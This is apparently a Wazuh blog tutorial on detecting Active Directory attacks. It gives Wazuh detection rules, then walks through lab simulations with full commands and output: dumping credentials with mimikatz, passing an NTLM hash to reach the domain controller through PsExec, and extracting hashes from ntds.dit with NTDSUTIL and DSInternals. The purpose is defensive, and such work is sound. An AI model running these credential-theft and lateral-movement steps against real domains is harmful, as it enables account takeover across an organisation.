How to detect Active Directory attacks with Wazuh [Part 2 of 2]

| by Anthony Faruna | Wazuh 4.3
Post icon

Active Directory (AD) is the most widely used Identity and Access Management (IAM) technology for Windows domain networks in modern organizations. It is adopted by small, medium, and large enterprises to manage enterprise networks, so it is an ideal target for attackers. AD is a perfect target for attackers because many system administrators use it to manage enterprise networks.

To defend against threats, organizations need to implement the principle of defense in depth. Implementing several layers of defense mechanisms ensures that when the initial line of defense fails and hackers get access to Active Directory, the consequences are limited and contained. 

In this blog post, we demonstrate how to simulate and detect the following AD attacks:

  • Pass the hash (PtH) attacks
  • Ntds.dit password extraction

Active Directory attacks: Infrastructure setup

We use the following setup to simulate AD attacks and show how Wazuh can detect them:

  • A Centos 7 endpoint with Wazuh 4.3.10 installed. You can install the Wazuh central components using this Quickstart installation guide.
  • A Windows Server 2022 domain controller running the Wazuh agent 4.3.10. This domain controller hosts the Active Directory infrastructure. You can use this Wazuh guide to install the Wazuh agent. In this blogpost, we use the domain names Windows10 and wazuhtest.com
  • A Windows 10 Pro or Enterprise edition endpoint running Wazuh agent 4.3.10. The Windows 10 endpoint is registered to the Active Directory and serves as the attacker’s initial foothold after compromise. 
  • A domain account on the Active Directory with local administrative privilege on the compromised Windows 10 endpoint. This account is the compromised user account used to simulate our attacks. 
  • A domain administrator account on the Active Directory is required to serve as the target of the pass the hash attack.
  • A Mimikatz copy in the compromised Windows 10 endpoint. To run the mimikatz.exe, you can navigate to the mimikatz_trunk/x64 (or x32, depending on your system architecture). Mimikatz is required to perform the attack simulations.

Detection rules

To detect AD attacks, we create rules on the Wazuh server to detect IoCs in Windows security events and system events monitored by Sysmon.

Sysmon integration

1. Download Sysmon from the Microsoft Sysinternals page with the configuration file sysmonconfig.xml on the Windows 2022 domain controller and the compromised Windows 10  endpoint.

2. Run the following command to install Sysmon with the downloaded configuration file via PowerShell (run as administrator):

.\sysmon.exe -accepteula -i sysmonconfig.xml

3. Configure both Wazuh agents to collect Sysmon events by adding the following settings to the agent configuration file in "C:\Program Files (x86)\ossec-agent\ossec.conf":

<ossec_config>
  <localfile>    
    <location>Microsoft-Windows-Sysmon/Operational</location>
    <log_format>eventchannel</log_format>
  </localfile>
</ossec_config>

4. Apply the changes by restarting the agents using this PowerShell command:

Restart-Service -Name wazuh

Wazuh server configuration

1. To generate alerts on the Wazuh dashboard whenever an attacker performs any of the attacks mentioned above,  add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server:

<group name="security_event, windows,">

  <!-- This rule detects when PsExec is launched remotely to perform lateral movement within the domain. The rule uses Sysmon events collected from the domain controller. -->
  <rule id="110004" level="12">
    <if_sid>61600</if_sid>
    <field name="win.system.eventID" type="pcre2">17|18</field>
    <field name="win.eventdata.PipeName" type="pcre2">\\PSEXESVC</field>
    <options>no_full_log</options>
    <description>PsExec service launched for possible lateral movement within the domain</description>
  </rule>

  <!-- This rule detects NTDS.dit file extraction using a sysmon event captured on the domain controller -->
  <rule id="110006" level="12">
    <if_group>sysmon_event1</if_group>
    <field name="win.eventdata.commandLine" type="pcre2">NTDSUTIL</field>
    <description>Possible NTDS.dit file extraction using ntdsutil.exe</description>
  </rule>

  <!-- This rule detects Pass-the-ash (PtH) attacks using windows security event 4624 on the compromised endpoint -->
  <rule id="110007" level="12">
    <if_sid>60103</if_sid>
    <field name="win.system.eventID">^4624$</field>
    <field name="win.eventdata.LogonProcessName" type="pcre2">seclogo</field>
    <field name="win.eventdata.LogonType" type="pcre2">9</field>
    <field name="win.eventdata.AuthenticationPackageName" type="pcre2">Negotiate</field>
    <field name="win.eventdata.LogonGuid" type="pcre2">{00000000-0000-0000-0000-000000000000}</field>
    <options>no_full_log</options>
    <description>Possible Pass the hash attack</description>
  </rule>
  
  <!-- This rule detects credential dumping when the command sekurlsa::logonpasswords is run on mimikatz -->
  <rule id="110008" level="12">
    <if_sid>61612</if_sid>
    <field name="win.eventdata.TargetImage" type="pcre2">(?i)\\\\system32\\\\lsass.exe</field>
    <field name="win.eventdata.GrantedAccess" type="pcre2">(?i)0x1010</field>
    <description>Possible credential dumping using mimikatz</description>
  </rule>
  
</group>

2. Restart the Wazuh server to apply the configuration changes:

systemctl restart wazuh-manager

Active Directory attacks simulation

In this section, we show how to simulate some common active directory attacks, as mentioned earlier. To successfully simulate the attacks, the attacker compromises a user account with local administrator privileges on the Windows 10 endpoint.

Note

The <USERNAME> variable represents the compromised user account name on the active directory, which you use to simulate attacks.

Pass the hash attack simulation

Pass the Hash is a technique used by threat actors to steal credentials and perform lateral movement. This attack exploits the NTLM authentication protocol to authenticate a user with a password hash captured rather than using the account plaintext password.

1. Download PsTools to the compromised Windows 10 endpoint to demonstrate this attack.

2. Run PowerShell as administrator and change the current directory to the PsTools directory. Then run the .\PsExec.exe \\Windows2022DC.wazuhtest.com cmd command to connect to the domain controller and execute commands remotely. Replace with your own Windows server name. After running the command, access is denied because the current user does not have the required privilege to perform this operation.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSTools

C:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\Windows2022DC.wazuhtest.com cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access Windows2022DC.wazuhtest.com:
Access is denied.

C:\Users\<USERNAME>\Desktop\PSTools>

3. Open mimikatz as an administrator, then run the log passthehash.log and privilege::debug commands. The log passthehash.log enables logging of all the activities performed while the privilege::debug command grants the mimikatz process debug right by elevating privilege.

mimikatz # log passthehash.log
Using 'passthehash.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

4. Run sekurlsa::logonpasswords to extract password hashes from the LSASS.exe process memory, which stores the hashes for users with active sessions to the computer. The goal of this command is to obtain a user account with the relevant privileges to achieve the objective of the attack. We are looking for a user account with domain administrator privileges in this scenario.

mimikatz #sekurlsa::logonpasswords

We can see the NTLM hash of the user john is 812792a1f13bb10964ed1dfeac78c64b.

Authentication Id : 0 ; 4062248 (00000000:003dfc28)
Session           : RemoteInterActive from 5
User Name         : john
Domain            : WAZUHTEST
Logon Server      : Windows2022DC
Logon Time        : 12/2/2022 1:42:19 PM
SID               : S-1-5-21-1860018313-2454207738-2274937249-1110
        msv :
         [00000003] Primary
         * Username : john
         * Domain   : WAZUHTEST
         * NTLM     : 812792a1f13bb10964ed1dfeac78c64b
         * SHA1     : c109a02ac8caedb1b51f951b16ee024fe8bc6cd6
         * DPAPI    : 6d070f2e7b484db3aad54d6e17c5f8eb
        tspkg :
        wdigest :
         * Username : john
         * Domain   : WAZUHTEST
         * Password : (null)
        kerberos :
         * Username : john
         * Domain   : WAZUHTEST.COM
         * Password : (null)
        ssp :
        credman :
—---------------------------------------------------

5. Run the following command to authenticate as the compromised user. In this scenario, the NTLM hash of user John, a domain administrator on the Active Directory, is used to perform the attack. A command prompt session immediately opens after running the command.

mimikatz # sekurlsa::pth /user:John /domain:wazuhtest.com /ntlm:812792a1f13bb10964ed1dfeac78c64b
user    : John
domain  : wazuhtest.com
program : cmd.exe
impers. : no
NTLM    : 812792a1f13bb10964ed1dfeac78c64b
  |  PID  396
  |  TID  88
  |  LSA Process is now R/W
  |  LUID 0 ; 3971637 (00000000:003c9a35)
  \_ msv1_0   - data copy @ 0000013C12D90890 : OK !
  \_ kerberos - data copy @ 0000013C139ED498
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000013C1398D148 (32) -> null

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

6. Change the current Directory to the PsTools Directory and run the .\PsExec.exe \\Windows2022DC.wazuhtest.com cmd command to connect to the domain controller and execute commands remotely. After running the command, the connection was successful, and the session was authenticated with the credential of John, a domain administrator on the Active Directory.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSTools

C:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\Windows2022DC.wazuhtest.com cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.20348.1249]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wazuhtest\john

C:\Windows\system32>

Run whoami and hostname commands to verify the current session is authenticated as John, and the current file system is the domain controller.

C:\Windows\system32>whoami
wazuhtest\john

C:\Windows\system32>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                       Type             SID                                           Attributes
================================================ ================ ============================================= ===============================================================

C:\Windows\system32>Hostname
Windows2022DC

Ntds.dit password extraction simulation

The ntds.dit file located in C:\Windows\NTDS\  is the database that stores all the data in the Active Directory on every domain controller. Attackers can compromise users’ credentials by extracting the password hash from the ntds.dit file. This attack can be achieved by using several techniques to copy the ntds.dit file from the DC to a local system to crack the password offline.

An attacker needs access to the domain controller file system to extract ntds.dit file, hence this attack scenario will leverage the access obtained during pass the hash attack.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSTools

C:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\Windows2022DC.wazuhtest.com cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 10.0.20348.1249]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wazuhtest\john

1. Run the following command to exfiltrate ntds.dit file. The command also extracts the HKEY_LOCAL_MACHINE\SYSTEM and HKEY_LOCAL_MACHINE\SECURITY used for obtaining the Boot key that is required to decrypt the ntds.dit.

C:\Windows\system32>NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full C:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full C:\Files
Creating snapshot...
Snapshot set {811ff72d-e402-4b26-b437-b002f67cc4a9} generated successfully.
Snapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} mounted as C:\$SNAP_202212021554_VOLUMEC$\
Snapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202212021554_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: C:\Files\Active Directory\ntds.dit

                  Defragmentation  Status (complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying C:\Files\registry\SYSTEM
Copying C:\Files\registry\SECURITY
Snapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} unmounted.
IFM media created successfully in C:\Files
ifm: q
NTDSUTIL: q

2. Open PowerShell on the command prompt and run the following command replacing it with the path of the extracted HKEY_LOCAL_MACHINE\SYSTEM registry key. You can install DSInternals PowerShell Module to ensure the command executes without error.

C:\Windows\system32>powershell

PS C:\Windows\system32> $Key = Get-BootKey -SystemHiveFilePath C:\Files\registry\SYSTEM

3. Run the following command to extract password hashes from the ntds.dit file. 

PS C:\Windows\system32> Get-ADDBAccount -All -Bootkey $key -DBPath 'C:\Files\Active Directory\ntds.dit'

We can see that, for example, the NTLM hash of the Administrator account is  ef7638b237b9261793d27533b7dc701e:

e-DAcut-l-oky$e DPt :FlsAtvDrcoynd.i
DistinguishedName: CN=Administrator,CN=Users,DC=wazuhtest,DC=com
Sid: S-1-5-21-1860018313-2454207738-2274937249-500
Guid: d5feab09-3399-4318-87d8-9e2e99d224bd
SamAccountName: Administrator
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount
SupportedEncryptionTypes:
AdminCount: True
Deleted: False
LastLogonDate: 12/2/2022 10:31:21 AM
DisplayName:
GivenName:
Surname:
Description: Built-in account for administering the computer/domain
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1860018313-2454207738-2274937249-512
Secrets
  NTHash: ef7638b237b9261793d27533b7dc701e
  LMHash:
  NTHashHistory:
  LMHashHistory:
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash: 4608ad862cac4b7e5cef0730972b70ad
    Kerberos:

Detection result

After simulating the attacks, the alerts are generated on the Wazuh dashboard based on the events from the Windows 2022 domain controller.

active directory

After simulating pass the hash attack, the alerts are generated on the Wazuh dashboard based on events from the compromised Windows 10 endpoint.

installing active directory

Conclusion

Active Directory is a core component that facilitates the centralized administration of identities and resources in any organization. It has become a target for most attackers due to its wide adoption and uses. Hence, it is necessary to detect and defend against these attacks. It is essential to detect early indications of lateral movement and privilege escalation as it aids in preventing attacks.

This blog shows how Wazuh can detect some common Active Directory attacks using Windows security logs and events captured on Sysmon.